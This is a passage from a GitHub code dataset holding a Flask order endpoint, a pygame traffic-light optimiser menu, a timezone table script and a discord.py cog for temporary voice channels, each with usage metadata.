', methods=['GET'])\ndef handle(session_id, order_id):\n    # session_ids are 16 characters long\n    if len(session_id) != 16:\n        return '', status.HTTP_400_BAD_REQUEST\n\n    connector = mysql.connector.connect(\n        user=conf.user,\n        database=conf.database,\n        passwd=conf.passwd,\n        host=conf.host,\n        port=conf.port)\n\n    answer = {}\n\n    cursor = connector.cursor()\n\n    return_status = cursor.callproc('get_order', args=[session_id, order_id, 0])\n\n    if return_status[2] == 0:\n        # success!\n        result = next(cursor.stored_results())\n\n        line = next(result)\n\n        answer['ordered_on'] = line[0]\n        answer['order_total'] = line[1]\n        answer['order_status'] = line[2]\n        answer['items'] = []\n\n        cursor.callproc('get_order_items', args=[order_id])\n\n        result = next(cursor.stored_results())\n\n        for line in result:\n            answer['items'].append({'item_id': line[0], 'amount': line[1]})\n\n        # close the connection on the success path too, not just on errors\n        connector.close()\n        return json.dumps(answer, default=str), status.HTTP_200_OK\n    elif return_status[2] in (1, 2):\n        # user id could not be found or didn't own the order\n        connector.close()\n        return '', status.HTTP_401_UNAUTHORIZED\n    else:\n        # oh noes\n        connector.close()\n        return '', status.HTTP_500_INTERNAL_SERVER_ERROR\n", "repo_name": "qwertxzy/nozama-api", "sub_path": "endpoints/order.py", "file_name": "order.py", "file_ext": "py", "file_size_in_byte": 1531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_400_BAD_REQUEST", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 14, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 16, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 16, "usage_type": "name"}, {"api_name": "conf.user", "line_number": 17, "usage_type": "attribute"}, {"api_name": "conf.database", "line_number": 18, "usage_type": "attribute"}, {"api_name": "conf.passwd", "line_number": 19, "usage_type": "attribute"}, {"api_name": "conf.host", "line_number": 20, "usage_type": "attribute"}, {"api_name": "conf.port", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_200_OK", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 47, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_401_UNAUTHORIZED", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 51, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 55, "usage_type": "name"}]}
+{"seq_id": "40348893038", "text": "import pygame, pickle, sys, time, random, math\nfrom _thread import *\n\nstop_threads=True\npygame.display.init()\npygame.font.init()\n\nredAmber=pygame.image.load(\"TL A R.png\")\nred=pygame.image.load(\"TL R.png\")\namber=pygame.image.load(\"TL A.png\")\ngreen=pygame.image.load(\"TL G.png\")\n\nWIDTH=1200\nHEIGHT=800\nBACKGROUND=pygame.Color(\"#EAEAEA\")\nBLUE=pygame.Color(\"#00A896\")\nORANGE=pygame.Color(\"#89043D\")\nLB=pygame.Color(\"#2FE6DE\")\n\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\n\nstore = {TL:redAmber, Road:roadyBoi}\n\nclass Object(object):\n def __init__(self, x, y, width, height, typ):\n self.typ=typ\n self.x=x\n self.y=y\n self.width=width\n self.height=height\n\n def move(self, x, y, win):\n self.x=x\n self.y=y\n\n def draw(self, win):\n win.blit(redAmber, (self.x+1, self.y))\n pygame.draw.rect(win, self.typ, (self.x, self.y, self.width, self.height), 2)\n\nclass TrafficLight(Object):\n def __init__(self, x, y, timeOn, timeOff, points):\n width=20\n height=20\n Object.__init__(self, x, y, width, height, \"TL\")\n self.x=x\n self.y=y\n self.timeOn=timeOn\n self.timeOff=timeOff\n self.points=points\n\n \ndef drawText(win, text, x, y, size, colour):\n try:\n font = pygame.font.SysFont(\"Comic Sans\", size)\n toBlit = font.render(text, 1, colour, False)\n win.blit(toBlit, ( int( x-(toBlit.get_width()/2) ) , int( y-(toBlit.get_height()/2)) ))\n except:\n print('Font Error, Saw It Coming Ngl')\n\ndef normalMenu(win):\n pygame.draw.rect(win,BLUE, (0, 600, 100, 100), 2)\n drawText(win, \"Lights\", 50, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 600, 100, 100), 2)\n drawText(win, \"Roads\", 150, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 700, 100, 100), 2)\n drawText(win, \"Junctions\", 50, 720, 30, BLUE)\n pygame.draw.rect(win,BLUE, (0, 700, 100, 100), 2)\n drawText(win, \"Other\", 150, 720, 30, BLUE)\n \ndef drawAll(win, listy):\n win.fill(BACKGROUND)\n drawText(win, \"Return To Menu\", 60, 20, 20, BLUE)\n pygame.draw.rect(win,BLUE, (0, 10, 120, 20), 2)\n normalMenu(win)\n \n for i in listy:\n i.draw(win)\n\n pygame.display.flip()\n \ndef main(win):\n print(\"Design Phase Started\")\n pygame.display.set_caption('Design Phase')\n\n itemList=[]\n light=TrafficLight(40, 645, None, None, 0)\n itemList.append(light)\n\n while True:\n drawAll(win, itemList)\n \n mainMenu(win)\n\n\n\n\ndef threaded_title(win, WIDTH, HEIGHT):\n global stop_threads\n while stop_threads:\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE)\n drawText(win, \"Click To Start\", int(WIDTH/2), int(-100+HEIGHT/2), 50, BLUE)\n pygame.display.flip() \n else:\n break\n time.sleep(0.5)\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE) \n pygame.display.flip()\n else:\n break\n time.sleep(0.5)\n print(\"Thread Ended\")\n return\ndef mainMenu(win):\n global stop_threads \n print(\"Running Main Menu\")\n pygame.display.set_caption(\"Reinforcement Learning Traffic Lights\") \n stop_threads=True \n run = True \n clock = pygame.time.Clock() \n start_new_thread(threaded_title, (win, WIDTH, HEIGHT))\n print(\"Thread Started\") \n while run:\n clock.tick(30) \n for event in pygame.event.get():\n if event.type==pygame.QUIT:#Quit\n stop_threads=False\n print(\"Goodbye!\")\n pygame.quit()\n sys.exit()\n if event.type==pygame.MOUSEBUTTONDOWN:\n run = False\n stop_threads=False\n main(win)\nwhile True:\n try:\n 
mainMenu(win)\n except:\n sys.exit()\n", "repo_name": "BigDataCrackhead/NEA", "sub_path": "Old Versions/V2.py", "file_name": "V2.py", "file_ext": "py", "file_size_in_byte": 4003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.display.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 104, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 111, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 120, "usage_type": 
"call"}, {"api_name": "pygame.display", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 123, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 132, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 142, "usage_type": "call"}]}
+{"seq_id": "17069256446", "text": "#!/usr/bin/env python3\n\nimport pytz\nfrom datetime import datetime\nfrom random import choice\n\nfrom tabulate import tabulate\n\n\nZONES = {\n 'Cape Town': 'Africa/Johannesburg',\n 'London': 'Europe/London',\n 'Toronto': 'Canada/Eastern',\n 'Kathmandu': 'Asia/Kathmandu',\n 'Nairobi': 'Africa/Nairobi',\n}\nDATE_FORMAT = '%d-%m-%y %H:%M:%S'\nHEADER = ['Location', 'Date', 'Time']\nTABLE_FORMAT = 'pretty'\nTABLE_FORMATS = [\n 'plain',\n 'simple',\n 'github',\n 'grid',\n 'fancy_grid',\n 'pipe',\n 'orgtbl',\n 'jira',\n 'presto',\n 'pretty',\n 'psql',\n]\n\n\ndef main(fmt=None, header=[]):\n table = []\n for label, tz in ZONES.items():\n dt_str = datetime.now(pytz.timezone(tz)).strftime(DATE_FORMAT)\n table.append([label] + dt_str.split())\n\n fmt = fmt or TABLE_FORMAT\n print(tabulate(table, headers=header, tablefmt=fmt))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "joshuaberetta/times", "sub_path": "times.py", "file_name": "times.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 38, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "31093097958", "text": "from __future__ import annotations\nfrom typing import Optional\n\nimport discord\nimport re\nfrom discord import app_commands, utils\nfrom discord.ext import commands, tasks\nfrom collections import defaultdict\nimport json\nimport asyncio\nfrom bot.common import GuildBot, extension_setup\nfrom pathlib import Path\n\n\nclass SquadVoice(commands.Cog):\n data_directory = \"data/squad_voice/\"\n channel_creators_filename = \"channel-creators.json\"\n temporary_channels_filename = \"temporary-channels.json\"\n\n def __init__(self, bot: GuildBot):\n self.bot = bot\n self.channel_creators = {}\n self.all_temporary_channels = {}\n\n self.channel_creators_path = Path(self.data_directory, self.channel_creators_filename).resolve()\n self.temporary_channels_path = Path(self.data_directory, self.temporary_channels_filename).resolve()\n\n self.voice_creator_commands: Optional[app_commands.Group] = None\n self.created_channel_commands: Optional[app_commands.Group] = None\n\n async def cog_load(self) -> None:\n self.create_command_groups()\n self.register_voice_creator_commands_to_group()\n self.register_created_channel_commands_to_group()\n\n Path(self.data_directory).mkdir(exist_ok=True)\n self.channel_creators_path.touch(exist_ok=True)\n self.temporary_channels_path.touch(exist_ok=True)\n\n self.bot.loop.create_task(self.load_from_json())\n\n def cog_unload(self) -> None:\n if self.channel_creators:\n self.dump_channel_creators()\n if self.all_temporary_channels:\n self.dump_temporary_channels()\n\n def dump_channel_creators(self):\n data = [{\"channel_id\": channel_creator.channel.id,\n \"create_name\": channel_creator.create_name,\n \"create_category_id\": channel_creator.create_category.id if channel_creator.create_category else None,\n \"create_user_limit\": channel_creator.create_user_limit}\n for channel_creator in self.channel_creators.values()]\n with open(self.channel_creators_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n def dump_temporary_channels(self):\n data = [{\"channel_id\": temporary_channel.channel.id,\n \"index\": temporary_channel.index,\n \"creator\": temporary_channel.creator.channel.id}\n for temporary_channel in self.all_temporary_channels.values()]\n with open(self.temporary_channels_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n async def load_channel_creators_from_json(self):\n await self.bot.wait_until_ready()\n\n with open(self.channel_creators_path, \"r\") as readfile:\n try:\n channel_creators_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.channel_creators = {}\n\n for channel_creator_data in channel_creators_data:\n try:\n channel_creator_data[\"channel\"] = await self.bot.fetch_channel(channel_creator_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n del channel_creator_data[\"channel_id\"]\n if channel_creator_data[\"create_category_id\"]:\n try:\n channel_creator_data[\"create_category\"] = await self.bot.fetch_channel(channel_creator_data[\"create_category_id\"])\n except discord.NotFound:\n channel_creator_data[\"create_category\"] = channel_creator_data[\"channel\"].category\n else:\n channel_creator_data[\"create_category\"] = None\n del channel_creator_data[\"create_category_id\"]\n channel_creator = ChannelCreator(self, **channel_creator_data)\n self.channel_creators[channel_creator.channel.id] = channel_creator\n\n async def load_temporary_channels_from_json(self):\n with open(self.temporary_channels_path, \"r\") as 
readfile:\n try:\n temporary_channels_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.all_temporary_channels = {}\n\n for temporary_channel_data in temporary_channels_data:\n try:\n channel: discord.VoiceChannel = await self.bot.fetch_channel(temporary_channel_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n if len(channel.members) == 0:\n await channel.delete()\n elif channel and temporary_channel_data[\"creator\"] in self.channel_creators.keys():\n channel_creator = self.channel_creators[temporary_channel_data[\"creator\"]]\n temporary_channel = TemporaryChannel(self, channel_creator,\n temporary_channel_data[\"index\"], channel_creator.create_category,\n channel_creator.create_name, channel_creator.create_user_limit,\n channel)\n await temporary_channel.ready.wait()\n channel_creator.register_temporary_channel(temporary_channel, dump=False)\n\n async def load_from_json(self):\n await self.load_channel_creators_from_json()\n await self.load_temporary_channels_from_json()\n\n self.dump_temporary_channels()\n self.dump_channel_creators()\n\n async def get_temporary_channel(self, interaction: discord.Interaction) -> Optional[TemporaryChannel]:\n voice_state = interaction.user.voice\n if not voice_state:\n await interaction.response.send_message(\"You are not in a voice channel.\", ephemeral=True)\n return None\n\n in_channel = voice_state.channel\n try:\n return self.all_temporary_channels[in_channel.id]\n except KeyError:\n await interaction.response.send_message(\"You are not in a temporary voice channel.\", ephemeral=True)\n return None\n\n async def do_limit_command(self, interaction: discord.Interaction, size, message):\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if size == 0:\n size = None\n elif size < 0:\n await interaction.response.send_message(\"Cannot set negative channel size.\", ephemeral=True)\n return\n\n await temporary_channel.edit(user_limit=size)\n\n await interaction.response.send_message(message % (temporary_channel.channel.mention, size or \"unlimited\"))\n\n async def check_joined_creator_channel(self, user, channel_moved_to):\n if channel_moved_to.channel is None:\n return\n\n try:\n joined_channel_creator = self.channel_creators[channel_moved_to.channel.id]\n except KeyError:\n return\n\n new_temporary_channel = await joined_channel_creator.create_temporary_channel()\n await new_temporary_channel.ready.wait()\n await user.move_to(new_temporary_channel.channel)\n\n async def check_left_temporary_channel(self, channel_moved_from):\n if channel_moved_from.channel is None:\n return\n\n try:\n left_temp_channel = self.all_temporary_channels[channel_moved_from.channel.id]\n except KeyError:\n return\n\n voice_states = channel_moved_from.channel.voice_states\n if len(voice_states) == 0:\n await left_temp_channel.delete()\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, user, before, after):\n if before.channel == after.channel:\n return\n await self.check_joined_creator_channel(user, after)\n await self.check_left_temporary_channel(before)\n\n def create_command_groups(self):\n self.voice_creator_commands = app_commands.Group(name=\"voicecreator\",\n description=\"Incremental Channel Creator Commands.\",\n guild_only=True,\n default_permissions=discord.Permissions(manage_channels=True))\n self.created_channel_commands = app_commands.Group(name=\"voice\",\n description=\"Created Channel Commands.\",\n guild_only=True)\n\n 
self.__cog_app_commands__.append(self.voice_creator_commands)\n self.__cog_app_commands__.append(self.created_channel_commands)\n\n def register_voice_creator_commands_to_group(self):\n @self.voice_creator_commands.command(name=\"create\")\n @app_commands.rename(category=\"creator_category\",\n create_name=\"created_name\",\n create_category=\"created_category\")\n async def _create_channel_creator(interaction: discord.Interaction,\n name: str,\n category: Optional[discord.CategoryChannel] = None,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Create an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n Name of channel creator.\n category : Optional[discord.CategoryChannel]\n Category to place creator into.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n new_channel_creator_channel = await interaction.guild.create_voice_channel(name=name, category=category)\n self.channel_creators[new_channel_creator_channel.id] = ChannelCreator(self,\n new_channel_creator_channel,\n create_name or name,\n create_category or category,\n user_limit)\n self.dump_channel_creators()\n await interaction.response.send_message(\n f\"Created new incremental channel creator {new_channel_creator_channel.mention} successfully.\")\n\n @self.voice_creator_commands.command(name=\"delete\")\n async def _delete_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel):\n \"\"\"Delete an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to delete.\n \"\"\"\n\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(\n f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n await self.channel_creators[channel.id].delete()\n await interaction.response.send_message(\n f\"Successfully deleted incremental voice channel creator with ID `{channel.id}`\")\n\n @self.voice_creator_commands.command(name=\"edit\")\n @app_commands.rename(create_name=\"created_name\",\n create_category=\"created_category\")\n async def _edit_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Edit an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to edit.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n channel_creator = self.channel_creators[channel.id]\n await channel_creator.edit(create_name, create_category, user_limit)\n await interaction.response.send_message(\n f\"Successfully 
edited incremental channel creator {channel_creator.channel.mention}\")\n\n def register_created_channel_commands_to_group(self):\n @self.created_channel_commands.command(name=\"resize\")\n @app_commands.checks.cooldown(2, 60)\n async def _resize(interaction: discord.Interaction,\n size: int):\n \"\"\"Resize your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n size : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, size, \"Successfully set %s size to `%s`\")\n\n @self.created_channel_commands.command(name=\"limit\")\n @app_commands.checks.cooldown(2, 60)\n async def _limit(interaction: discord.Interaction,\n limit: int):\n \"\"\"Apply a user limit to your voice channel. 0 removes the limit.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n limit : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, limit, \"Successfully limited %s to `%s`\")\n\n @self.created_channel_commands.command(name=\"unlimit\")\n @app_commands.checks.cooldown(2, 60)\n async def _unlimit(interaction: discord.Interaction):\n \"\"\"Unlimit your voice channel.\"\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n await temporary_channel.edit(user_limit=None)\n\n await interaction.response.send_message(f\"Successfully unlimited {temporary_channel.channel.mention}\")\n\n @self.created_channel_commands.command(name=\"rename\")\n @app_commands.checks.cooldown(2, 60)\n async def _rename(interaction: discord.Interaction,\n name: str):\n \"\"\"Rename your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n New name of the channel.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if re.match(r\"#\\d+\", name.lower().removeprefix(temporary_channel.creator.create_name.lower()).strip()):\n await interaction.response.send_message(\"Please don't use misleading channel names.\", ephemeral=True)\n return\n\n await temporary_channel.edit(name=name)\n\n await interaction.response.send_message(f\"Successfully renamed {temporary_channel.channel.mention}\")\n\n\nclass ChannelCreator:\n def __init__(self, cog: SquadVoice, channel: discord.VoiceChannel, create_name: str,\n create_category: discord.CategoryChannel = None, create_user_limit: int = None):\n self.cog = cog\n self.channel = channel\n self.create_name = create_name\n self.create_category = create_category\n self.create_user_limit = create_user_limit\n self.created_channels = {}\n self.used_indexes = set()\n\n async def delete(self):\n cache = self.created_channels.copy().values()\n for created_channel in cache:\n await created_channel.delete(dump=False)\n self.cog.dump_temporary_channels()\n del cache\n\n await self.channel.delete()\n\n del self.cog.channel_creators[self.channel.id]\n self.cog.dump_channel_creators()\n\n def get_minimum_unused_index(self):\n if len(self.used_indexes) == 0:\n return 1\n minval, maxval = min(self.used_indexes), max(self.used_indexes)\n if len(self.used_indexes) < maxval - minval + 1:\n return min(set(range(minval, maxval + 1)) - self.used_indexes)\n else:\n return len(self.used_indexes) + 1\n\n async def create_temporary_channel(self):\n index = 
self.get_minimum_unused_index()\n temporary_channel = TemporaryChannel(self.cog, self, index, self.create_category,\n self.create_name, self.create_user_limit)\n await temporary_channel.ready.wait()\n self.register_temporary_channel(temporary_channel)\n\n return temporary_channel\n\n def register_temporary_channel(self, temporary_channel, dump=True):\n self.used_indexes.add(temporary_channel.index)\n self.created_channels[temporary_channel.channel.id] = temporary_channel\n self.cog.all_temporary_channels[temporary_channel.channel.id] = temporary_channel\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, create_name: str = None, create_category: discord.CategoryChannel = None,\n create_user_limit: int = False):\n changed = False\n if create_name is not None:\n self.create_name = create_name\n changed = True\n\n if create_user_limit is not None:\n if create_user_limit <= 0:\n self.create_user_limit = None\n else:\n self.create_user_limit = int(create_user_limit)\n changed = True\n\n if create_category is not None:\n self.create_category = create_category\n\n changed = True\n\n if changed:\n for _, temporary_channel in sorted(self.created_channels.items()):\n await temporary_channel.edit(name=self.create_name, category=self.create_category,\n user_limit=self.create_user_limit)\n\n\nclass TemporaryChannel:\n def __init__(self, cog: SquadVoice, creator: ChannelCreator, index: int,\n category: discord.CategoryChannel, name: str, user_limit: Optional[int] = None,\n channel: discord.VoiceChannel = None):\n self.cog = cog\n self.creator = creator\n self.index = index\n self.name = name\n self.channel = channel\n self.category = category\n self.user_limit = user_limit\n self.edited_recently = defaultdict(lambda: False)\n self.ready = asyncio.Event()\n\n loop = asyncio.get_event_loop()\n loop.create_task(self.ready_up())\n\n async def ready_up(self):\n to_name = self.make_name()\n if not self.channel:\n guild = self.creator.channel.guild\n try:\n assert type(guild) is discord.Guild\n except AssertionError:\n guild = utils.get(self.cog.bot.guilds, id=guild.id)\n\n try:\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n except discord.HTTPException as error:\n if \"Category does not exist\" in str(error):\n self.creator.create_category = self.creator.channel.category\n self.category = self.creator.create_category\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n self.cog.dump_channel_creators()\n else:\n raise error\n\n self.ready.set()\n\n def make_edit_timer(self, time: int, property_name: str):\n async def _job():\n await asyncio.sleep(time)\n self.edited_recently[property_name] = False\n\n self.edited_recently[property_name] = bool(asyncio.create_task(_job()))\n\n def make_name(self):\n if self.name == self.creator.create_name:\n return f\"{self.name} #{str(self.index)}\"\n else:\n return self.name\n\n async def delete(self, dump=True):\n\n await self.channel.delete()\n\n self.creator.used_indexes.remove(self.index)\n\n del self.creator.created_channels[self.channel.id]\n del self.cog.all_temporary_channels[self.channel.id]\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, index: int = None, category: discord.CategoryChannel = False, name: str = None,\n user_limit: Optional[int] or bool = False) -> None:\n\n changed = False\n if index:\n self.index = index\n changed = True\n\n if category or category is None:\n self.category = 
category\n changed = True\n\n if name:\n self.name = name\n changed = True\n\n if user_limit or user_limit is None:\n self.user_limit = user_limit\n changed = True\n\n if changed:\n await self.channel.edit(name=self.make_name(), category=self.category,\n user_limit=self.user_limit if self.user_limit is not None else 0)\n\n\nsetup = extension_setup(SquadVoice)\n", "repo_name": "Lordfirespeed/Centrifuge", "sub_path": "bot/cogs/squad_voice.py", "file_name": "squad_voice.py", "file_ext": "py", "file_size_in_byte": 22581, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 15, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "bot.common.GuildBot", "line_number": 20, "usage_type": "name"}, {"api_name": "bot.common", "line_number": 21, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 25, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 28, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 29, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 63, "usage_type": "call"}, {"api_name": "json.load", "line_number": 70, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 71, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 79, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 86, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 98, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 105, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 106, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 127, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 140, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 181, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 181, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 181, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 189, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 189, "usage_type": "name"}, {"api_name": "discord.Permissions", "line_number": 192, "usage_type": "call"}, {"api_name": "discord.app_commands.Group", "line_number": 193, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 193, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 205, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 207, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 207, "usage_type": 
